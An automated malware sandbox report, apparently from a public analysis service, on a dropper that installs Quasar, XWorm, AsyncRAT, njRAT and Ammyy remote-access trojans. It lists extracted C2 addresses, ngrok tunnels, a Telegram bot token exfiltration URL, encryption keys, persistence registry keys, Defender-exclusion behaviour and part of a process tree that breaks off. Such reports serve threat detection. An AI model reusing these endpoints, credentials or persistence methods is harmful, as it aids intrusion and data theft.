ammyyadmin | e4ec3a45621dd556deeea5f953fa05909c82630e9f17baf6b14272a0360d62d1

max time kernel
538s
max time network
538s
platform
windows11-21h2_x64
resource
win11-20241023-en
resource tags

arch:x64arch:x86image:win11-20241023-enlocale:en-usos:windows11-21h2-x64system
submitted
25-01-2025 00:29

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

4363463463464363463463463.exe
Size

10KB
MD5

2a94f3960c58c6e70826495f76d00b85
SHA1

e2a1a5641295f5ebf01a37ac1c170ac0814bb71a
SHA256

2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
SHA512

fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f
SSDEEP

192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K

Score

10^/10

ammyyadmin asyncrat flawedammyy njrat quasar xworm ddns default hacked microsoft office04 defense_evasion discovery execution persistence rat spyware trojan upx

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

Office04

hilol.zapto.org:20

5.144.179.134:1604

0.tcp.us-cal-1.ngrok.io:15579

Mutex

11bbf22e-826e-486b-b024-adbd86228a9e

Attributes

encryption_key
7A589EDBC6A581E125BF830EF0D05FC74BB75E30
install_name
Client.exe
log_directory
Logs
reconnect_delay
3000
startup_key
ctfmon
subdirectory
SubDir

Extracted

Family

xworm

Version

5.0

Mutex

md2hTRMYBpbXprs1

Attributes

Install_directory
%AppData%
install_file
Steam.exe
pastebin_url
https://pastebin.com/raw/Pit7WkAV
telegram
https://api.telegram.org/bot7494729704:AAGLY8mnPxkjjCvoEz520yCBT4GLhlnhRaI/sendMessage?chat_id=7222032715

aes.plain

Extracted

Family

quasar

Version

1.4.1

Botnet

DDNS

193.161.193.99:32471

Mutex

807f3187-d087-4fff-beff-e73293a32af8

Attributes

encryption_key
81A0C14D4C705B3C678E573C849DE7F6A3671A8B
install_name
jusched.exe
log_directory
CachedLogs
reconnect_delay
3000
startup_key
Java Update Scheduler
subdirectory
Java

Extracted

Family

xworm

45.141.26.134:7000

Attributes

Install_directory
%AppData%
install_file
svchost.exe

Extracted

Family

quasar

Version

1.4.1

Botnet

microsoft

193.161.193.99:25170

Mutex

06cb3c8b-d800-42d6-af01-12c4e1f138b0

Attributes

encryption_key
95C77D90C8A49F5740548C8A0A430C41732B639C
install_name
runtime.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Runtime

Extracted

Family

njrat

Version

Njrat 0.7 Golden By Hassan Amiri

Botnet

HacKed

82.193.104.21:5137

Mutex

Windows Update

Attributes

reg_key
Windows Update
splitter
|Hassan|

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

Default

ratlordvc.ddns.net:6606

1.tcp.ap.ngrok.io:21049

18.141.204.5:80

Mutex

AsyncMutex_6SI8OkPnk

Attributes

delay
3
install
true
install_file
tesst.exe
install_folder
%AppData%

aes.plain

Extracted

Family

asyncrat

Version

0.5.8

Botnet

Default

0.tcp.in.ngrok.io:10147

Mutex

Q52IWD1RYgpZ

Attributes

delay
3
install
false
install_file
Listopener.exe
install_folder
%AppData%

aes.plain

Signatures

Ammyy Admin
Remote admin tool with various capabilities.
rat ammyyadmin

AmmyyAdmin payload 1 IoCs

resource	yara_rule
behavioral2/files/0x0003000000025cde-394.dat	family_ammyyadmin

Ammyyadmin family
ammyyadmin
AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat

Detect Xworm Payload 4 IoCs

resource	yara_rule
behavioral2/files/0x000900000002571b-213.dat	family_xworm
behavioral2/memory/3276-218-0x00000000004D0000-0x00000000004E0000-memory.dmp	family_xworm
behavioral2/files/0x0002000000025ce6-415.dat	family_xworm
behavioral2/memory/1436-421-0x0000000000420000-0x0000000000438000-memory.dmp	family_xworm

FlawedAmmyy RAT
Remote-access trojan based on leaked code for the Ammyy remote admin software.
trojan flawedammyy
Flawedammyy family
flawedammyy
Njrat family
njrat
Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 11 IoCs

resource	yara_rule
behavioral2/files/0x000400000002571a-115.dat	family_quasar
behavioral2/memory/4376-122-0x00000000001F0000-0x0000000000514000-memory.dmp	family_quasar
behavioral2/files/0x0004000000025c2c-266.dat	family_quasar
behavioral2/memory/3456-271-0x0000000000EE0000-0x0000000001204000-memory.dmp	family_quasar
behavioral2/files/0x0003000000025cd6-358.dat	family_quasar
behavioral2/files/0x0007000000025cd8-364.dat	family_quasar
behavioral2/memory/2172-371-0x0000000000C60000-0x0000000000F84000-memory.dmp	family_quasar
behavioral2/files/0x0002000000025ce0-437.dat	family_quasar
behavioral2/memory/872-442-0x0000000000300000-0x0000000000634000-memory.dmp	family_quasar
behavioral2/files/0x001b00000002abc8-538.dat	family_quasar
behavioral2/memory/4836-543-0x00000000002C0000-0x00000000005E4000-memory.dmp	family_quasar

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm
njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat

Async RAT payload 4 IoCs

rat

resource	yara_rule
behavioral2/files/0x001a00000002abd1-556.dat	family_asyncrat
behavioral2/files/0x0009000000025966-574.dat	family_asyncrat
behavioral2/files/0x000b000000025cd2-589.dat	family_asyncrat
behavioral2/files/0x0003000000025ccc-618.dat	family_asyncrat

Blocklisted process makes network request 4 IoCs

flow	pid	Process
27	2080	powershell.exe
41	2080	powershell.exe
64	2080	powershell.exe
89	2080	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2076	powershell.exe
2064	powershell.exe
3720	powershell.exe
4884	powershell.exe
720	powershell.exe
4672	powershell.exe
2092	powershell.exe
4860	powershell.exe

Downloads MZ/PE file 16 IoCs

flow	pid	Process
21	2760	4363463463464363463463463.exe
36	2760	4363463463464363463463463.exe
39	2760	4363463463464363463463463.exe
45	2760	4363463463464363463463463.exe
5	2760	4363463463464363463463463.exe
20	2760	4363463463464363463463463.exe
20	2760	4363463463464363463463463.exe
20	2760	4363463463464363463463463.exe
20	2760	4363463463464363463463463.exe
20	2760	4363463463464363463463463.exe
20	2760	4363463463464363463463463.exe
20	2760	4363463463464363463463463.exe
20	2760	4363463463464363463463463.exe
20	2760	4363463463464363463463463.exe
20	2760	4363463463464363463463463.exe
6	2760	4363463463464363463463463.exe

Drops startup file 6 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Java update.exe	system32.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Java update.exe	system32.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Steam.lnk	XClient.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Steam.lnk	XClient.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk	svchost.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk	svchost.exe

Executes dropped EXE 59 IoCs

pid	Process
1444	compiled.exe
1948	compiled.exe
1220	1188%E7%83%88%E7%84%B0.exe
4376	skibidi.exe
2044	Client.exe
1944	Client.exe
4288	Client.exe
1640	Client.exe
2640	Client.exe
2836	Client.exe
3992	Client.exe
2100	Client.exe
3776	Client.exe
1764	Client.exe
4876	Client.exe
4948	Client.exe
1948	Client.exe
3276	XClient.exe
4060	Client.exe
3456	windowshost.exe
3692	xworm.exe
436	Client.exe
2572	Steam.exe
4648	Client.exe
4624	%EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe
232	CritScript.exe
2172	JUSCHED.EXE
1816	jusched.exe
4500	Client.exe
2108	CE5M.exe
1672	Ammyy.exe
2836	Ammyy.exe
5056	Ammyy.exe
4720	All function.exe
1436	svchost.exe
1696	ALL slumzick.exe
4836	svchost.exe
872	Client-built.exe
2572	runtime.exe
456	Client.exe
4236	Client.exe
4836	RunTimeBroker%20(2).exe
3928	system32.exe
3252	ddosziller.exe
3868	tesst.exe
4104	svchost.exe
3100	Steam.exe
1736	Krishna33.exe
644	image%20logger.exe
840	svchost.exe
1524	Steam.exe
4972	handeltest.exe
4684	Client.exe
956	svchost.exe
1144	Steam.exe
3096	svchost.exe
3560	Steam.exe
4520	svchost.exe
1784	Steam.exe

Loads dropped DLL 20 IoCs

pid	Process
1948	compiled.exe
1948	compiled.exe
1948	compiled.exe
1948	compiled.exe
1948	compiled.exe
1948	compiled.exe
1948	compiled.exe
1948	compiled.exe
1948	compiled.exe
1948	compiled.exe
1948	compiled.exe
1948	compiled.exe
1948	compiled.exe
1948	compiled.exe
1948	compiled.exe
1948	compiled.exe
1948	compiled.exe
1948	compiled.exe
1948	compiled.exe
1948	compiled.exe

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Update = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\Files\\system32.exe\" .."	system32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Update = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\Files\\system32.exe\" .."	system32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000\Software\Microsoft\Windows\CurrentVersion\Run\Steam = "C:\\Users\\Admin\\AppData\\Roaming\\Steam.exe"	XClient.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Roaming\\svchost.exe"	svchost.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 64 IoCs

Web Service

T1102

flow	ioc
399	pastebin.com
90	pastebin.com
127	pastebin.com
181	pastebin.com
188	pastebin.com
78	pastebin.com
261	pastebin.com
394	pastebin.com
70	pastebin.com
286	pastebin.com
371	pastebin.com
374	pastebin.com
193	pastebin.com
4	raw.githubusercontent.com
59	pastebin.com
63	pastebin.com
96	pastebin.com
248	0.tcp.in.ngrok.io
256	pastebin.com
263	pastebin.com
356	pastebin.com
403	pastebin.com
82	pastebin.com
113	pastebin.com
206	pastebin.com
295	pastebin.com
318	pastebin.com
376	pastebin.com
49	pastebin.com
228	pastebin.com
275	pastebin.com
290	pastebin.com
360	pastebin.com
408	pastebin.com
30	pastebin.com
309	pastebin.com
321	pastebin.com
352	pastebin.com
43	pastebin.com
363	pastebin.com
33	pastebin.com
196	pastebin.com
267	pastebin.com
339	0.tcp.in.ngrok.io
387	pastebin.com
200	pastebin.com
213	pastebin.com
250	pastebin.com
299	pastebin.com
105	pastebin.com
133	pastebin.com
160	pastebin.com
173	pastebin.com
305	pastebin.com
348	pastebin.com
384	pastebin.com
25	pastebin.com
148	pastebin.com
252	pastebin.com
344	pastebin.com
66	pastebin.com
180	pastebin.com
280	pastebin.com
165	pastebin.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
1	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Drops file in System32 directory 6 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5	Ammyy.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE	Ammyy.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies	Ammyy.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5	Ammyy.exe
File created	C:\Windows\system32\runtime.exe	Client-built.exe
File opened for modification	C:\Windows\system32\runtime.exe	Client-built.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 3692 set thread context of 3544	3692	xworm.exe	193

UPX packed file 3 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x001a00000002abbd-98.dat	upx
behavioral2/memory/1220-105-0x0000000000400000-0x0000000000516000-memory.dmp	upx
behavioral2/memory/1220-109-0x0000000000400000-0x0000000000516000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 2 IoCs

pid	pid_target	Process	procid_target
5028	3692	WerFault.exe	190
3384	4624	WerFault.exe	220

System Location Discovery: System Language Discovery 1 TTPs 23 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	4363463463464363463463463.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	compiled.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	compiled.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1188%E7%83%88%E7%84%B0.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xworm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Ammyy.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ddosziller.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tesst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Krishna33.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	image%20logger.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	%EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Client.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Ammyy.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	handeltest.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AppLaunch.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CritScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Ammyy.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 19 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
3820	PING.EXE
4908	PING.EXE
2024	PING.EXE
4884	PING.EXE
2792	PING.EXE
3808	PING.EXE
3372	PING.EXE
2708	PING.EXE
4940	PING.EXE
1248	PING.EXE
1176	PING.EXE
2720	PING.EXE
3756	PING.EXE
3728	PING.EXE
4208	PING.EXE
3076	PING.EXE
2992	PING.EXE
1816	PING.EXE
3616	PING.EXE

Delays execution with timeout.exe 1 IoCs

defense_evasion

pid	Process
2068	timeout.exe

Modifies data under HKEY_USERS 9 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE	Ammyy.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Ammyy\Admin\hr = 537d567366087c6658524c17525306b3798d8831b36b	Ammyy.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Ammyy\Admin\hr3 = 0306c5d6ad7172c67d3b71518c9ccb19c8f350645c60b4c18f6326b857cdacc4163e4c82d72a937a050cd79c966ed6939a7b85ae44810f7a760b58fca4d2769c9276273260b384376a960c	Ammyy.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix	Ammyy.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:"	Ammyy.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"	Ammyy.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Ammyy\Admin	Ammyy.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Ammyy	Ammyy.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Ammyy\Admin	Ammyy.exe

Modifies registry class 3 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings	CritScript.exe
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\MuiCache	MiniSearchHost.exe

Runs ping.exe 1 TTPs 19 IoCs

Remote System Discovery

T1018

pid	Process
3076	PING.EXE
4208	PING.EXE
3820	PING.EXE
2720	PING.EXE
2024	PING.EXE
4884	PING.EXE
3756	PING.EXE
2992	PING.EXE
1816	PING.EXE
2708	PING.EXE
4908	PING.EXE
3728	PING.EXE
3372	PING.EXE
4940	PING.EXE
1248	PING.EXE
1176	PING.EXE
3616	PING.EXE
3808	PING.EXE
2792	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 27 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
1996	schtasks.exe
4516	schtasks.exe
1708	schtasks.exe
1556	schtasks.exe
2640	schtasks.exe
1068	schtasks.exe
2208	schtasks.exe
3364	schtasks.exe
2800	schtasks.exe
4836	schtasks.exe
3092	schtasks.exe
3840	schtasks.exe
4344	schtasks.exe
4504	schtasks.exe
2548	schtasks.exe
2312	schtasks.exe
3896	schtasks.exe
560	schtasks.exe
1104	schtasks.exe
736	schtasks.exe
2752	schtasks.exe
4544	schtasks.exe
3164	schtasks.exe
1132	schtasks.exe
5028	schtasks.exe
3100	schtasks.exe
3920	schtasks.exe

Suspicious behavior: EnumeratesProcesses 36 IoCs

pid	Process
2092	powershell.exe
2092	powershell.exe
4860	powershell.exe
4860	powershell.exe
2076	powershell.exe
2076	powershell.exe
2064	powershell.exe
2064	powershell.exe
2080	powershell.exe
2080	powershell.exe
2656	powershell.exe
2656	powershell.exe
3720	powershell.exe
3720	powershell.exe
4884	powershell.exe
4884	powershell.exe
720	powershell.exe
720	powershell.exe
4672	powershell.exe
4672	powershell.exe
1436	svchost.exe
3252	ddosziller.exe
3252	ddosziller.exe
3252	ddosziller.exe
3252	ddosziller.exe
3252	ddosziller.exe
3252	ddosziller.exe
3252	ddosziller.exe
3252	ddosziller.exe
3252	ddosziller.exe
3252	ddosziller.exe
3252	ddosziller.exe
3252	ddosziller.exe
3252	ddosziller.exe
3252	ddosziller.exe
3252	ddosziller.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3928	system32.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2760	4363463463464363463463463.exe
Token: SeDebugPrivilege	4376	skibidi.exe
Token: SeDebugPrivilege	2044	Client.exe
Token: SeDebugPrivilege	1944	Client.exe
Token: SeDebugPrivilege	4288	Client.exe
Token: SeDebugPrivilege	1640	Client.exe
Token: SeDebugPrivilege	2640	Client.exe
Token: SeDebugPrivilege	2836	Client.exe
Token: SeDebugPrivilege	3992	Client.exe
Token: SeDebugPrivilege	2100	Client.exe
Token: SeDebugPrivilege	3776	Client.exe
Token: SeDebugPrivilege	1764	Client.exe
Token: SeDebugPrivilege	4876	Client.exe
Token: SeDebugPrivilege	4948	Client.exe
Token: SeDebugPrivilege	1948	Client.exe
Token: SeDebugPrivilege	3276	XClient.exe
Token: SeDebugPrivilege	2092	powershell.exe
Token: SeDebugPrivilege	4860	powershell.exe
Token: SeDebugPrivilege	2076	powershell.exe
Token: SeDebugPrivilege	2064	powershell.exe
Token: SeDebugPrivilege	4060	Client.exe
Token: SeDebugPrivilege	3456	windowshost.exe
Token: SeDebugPrivilege	2080	powershell.exe
Token: SeDebugPrivilege	2656	powershell.exe
Token: SeDebugPrivilege	436	Client.exe
Token: SeDebugPrivilege	2572	Steam.exe
Token: SeDebugPrivilege	4648	Client.exe
Token: SeDebugPrivilege	2172	JUSCHED.EXE
Token: SeDebugPrivilege	1816	jusched.exe
Token: SeDebugPrivilege	4500	Client.exe
Token: SeDebugPrivilege	1436	svchost.exe
Token: SeDebugPrivilege	4836	svchost.exe
Token: SeDebugPrivilege	872	Client-built.exe
Token: SeDebugPrivilege	2572	runtime.exe
Token: SeDebugPrivilege	3720	powershell.exe
Token: SeDebugPrivilege	4884	powershell.exe
Token: SeDebugPrivilege	720	powershell.exe
Token: SeDebugPrivilege	456	Client.exe
Token: SeDebugPrivilege	4672	powershell.exe
Token: SeDebugPrivilege	1436	svchost.exe
Token: SeDebugPrivilege	4236	Client.exe
Token: SeDebugPrivilege	4836	RunTimeBroker%20(2).exe
Token: SeDebugPrivilege	3252	ddosziller.exe
Token: SeDebugPrivilege	3868	tesst.exe
Token: SeDebugPrivilege	3928	system32.exe
Token: SeDebugPrivilege	4104	svchost.exe
Token: 33	3928	system32.exe
Token: SeIncBasePriorityPrivilege	3928	system32.exe
Token: SeDebugPrivilege	3100	Steam.exe
Token: 33	3928	system32.exe
Token: SeIncBasePriorityPrivilege	3928	system32.exe
Token: 33	3928	system32.exe
Token: SeIncBasePriorityPrivilege	3928	system32.exe
Token: 33	3928	system32.exe
Token: SeIncBasePriorityPrivilege	3928	system32.exe
Token: 33	3928	system32.exe
Token: SeIncBasePriorityPrivilege	3928	system32.exe
Token: 33	3928	system32.exe
Token: SeIncBasePriorityPrivilege	3928	system32.exe
Token: 33	3928	system32.exe
Token: SeIncBasePriorityPrivilege	3928	system32.exe
Token: 33	3928	system32.exe
Token: SeIncBasePriorityPrivilege	3928	system32.exe
Token: SeDebugPrivilege	840	svchost.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
3456	windowshost.exe
5056	Ammyy.exe

Suspicious use of SendNotifyMessage 2 IoCs

pid	Process
3456	windowshost.exe
5056	Ammyy.exe

Suspicious use of SetWindowsHookEx 11 IoCs

pid	Process
1220	1188%E7%83%88%E7%84%B0.exe
1220	1188%E7%83%88%E7%84%B0.exe
1220	1188%E7%83%88%E7%84%B0.exe
1220	1188%E7%83%88%E7%84%B0.exe
4624	%EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe
1240	OpenWith.exe
1816	jusched.exe
4500	Client.exe
2572	runtime.exe
1436	svchost.exe
4944	MiniSearchHost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2760 wrote to memory of 1444	2760	4363463463464363463463463.exe	79
PID 2760 wrote to memory of 1444	2760	4363463463464363463463463.exe	79
PID 2760 wrote to memory of 1444	2760	4363463463464363463463463.exe	79
PID 1444 wrote to memory of 1948	1444	compiled.exe	81
PID 1444 wrote to memory of 1948	1444	compiled.exe	81
PID 1444 wrote to memory of 1948	1444	compiled.exe	81
PID 2760 wrote to memory of 1220	2760	4363463463464363463463463.exe	82
PID 2760 wrote to memory of 1220	2760	4363463463464363463463463.exe	82
PID 2760 wrote to memory of 1220	2760	4363463463464363463463463.exe	82
PID 2760 wrote to memory of 4376	2760	4363463463464363463463463.exe	83
PID 2760 wrote to memory of 4376	2760	4363463463464363463463463.exe	83
PID 4376 wrote to memory of 2312	4376	skibidi.exe	84
PID 4376 wrote to memory of 2312	4376	skibidi.exe	84
PID 4376 wrote to memory of 2044	4376	skibidi.exe	86
PID 4376 wrote to memory of 2044	4376	skibidi.exe	86
PID 2044 wrote to memory of 4836	2044	Client.exe	87
PID 2044 wrote to memory of 4836	2044	Client.exe	87
PID 2044 wrote to memory of 4080	2044	Client.exe	89
PID 2044 wrote to memory of 4080	2044	Client.exe	89
PID 4080 wrote to memory of 1752	4080	cmd.exe	91
PID 4080 wrote to memory of 1752	4080	cmd.exe	91
PID 4080 wrote to memory of 3076	4080	cmd.exe	92
PID 4080 wrote to memory of 3076	4080	cmd.exe	92
PID 4080 wrote to memory of 1944	4080	cmd.exe	93
PID 4080 wrote to memory of 1944	4080	cmd.exe	93
PID 1944 wrote to memory of 3896	1944	Client.exe	94
PID 1944 wrote to memory of 3896	1944	Client.exe	94
PID 1944 wrote to memory of 3208	1944	Client.exe	96
PID 1944 wrote to memory of 3208	1944	Client.exe	96
PID 3208 wrote to memory of 3348	3208	cmd.exe	98
PID 3208 wrote to memory of 3348	3208	cmd.exe	98
PID 3208 wrote to memory of 2992	3208	cmd.exe	99
PID 3208 wrote to memory of 2992	3208	cmd.exe	99
PID 3208 wrote to memory of 4288	3208	cmd.exe	100
PID 3208 wrote to memory of 4288	3208	cmd.exe	100
PID 4288 wrote to memory of 1132	4288	Client.exe	101
PID 4288 wrote to memory of 1132	4288	Client.exe	101
PID 4288 wrote to memory of 4684	4288	Client.exe	103
PID 4288 wrote to memory of 4684	4288	Client.exe	103
PID 4684 wrote to memory of 5044	4684	cmd.exe	105
PID 4684 wrote to memory of 5044	4684	cmd.exe	105
PID 4684 wrote to memory of 1816	4684	cmd.exe	106
PID 4684 wrote to memory of 1816	4684	cmd.exe	106
PID 4684 wrote to memory of 1640	4684	cmd.exe	107
PID 4684 wrote to memory of 1640	4684	cmd.exe	107
PID 1640 wrote to memory of 5028	1640	Client.exe	108
PID 1640 wrote to memory of 5028	1640	Client.exe	108
PID 1640 wrote to memory of 2292	1640	Client.exe	110
PID 1640 wrote to memory of 2292	1640	Client.exe	110
PID 2292 wrote to memory of 2796	2292	cmd.exe	112
PID 2292 wrote to memory of 2796	2292	cmd.exe	112
PID 2292 wrote to memory of 3616	2292	cmd.exe	113
PID 2292 wrote to memory of 3616	2292	cmd.exe	113
PID 2292 wrote to memory of 2640	2292	cmd.exe	114
PID 2292 wrote to memory of 2640	2292	cmd.exe	114
PID 2640 wrote to memory of 560	2640	Client.exe	115
PID 2640 wrote to memory of 560	2640	Client.exe	115
PID 2640 wrote to memory of 1400	2640	Client.exe	117
PID 2640 wrote to memory of 1400	2640	Client.exe	117
PID 1400 wrote to memory of 1936	1400	cmd.exe	119
PID 1400 wrote to memory of 1936	1400	cmd.exe	119
PID 1400 wrote to memory of 2708	1400	cmd.exe	120
PID 1400 wrote to memory of 2708	1400	cmd.exe	120
PID 1400 wrote to memory of 2836	1400	cmd.exe	121

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe
"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"
1⤵
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2760
- C:\Users\Admin\AppData\Local\Temp\Files\compiled.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\compiled.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1444
- - C:\Users\Admin\AppData\Local\Temp\Files\compiled.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\compiled.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:1948
- C:\Users\Admin\AppData\Local\Temp\Files\1188%E7%83%88%E7%84%B0.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\1188%E7%83%88%E7%84%B0.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:1220
- C:\Users\Admin\AppData\Local\Temp\Files\skibidi.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\skibidi.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4376
- - C:\Windows\SYSTEM32\schtasks.exe
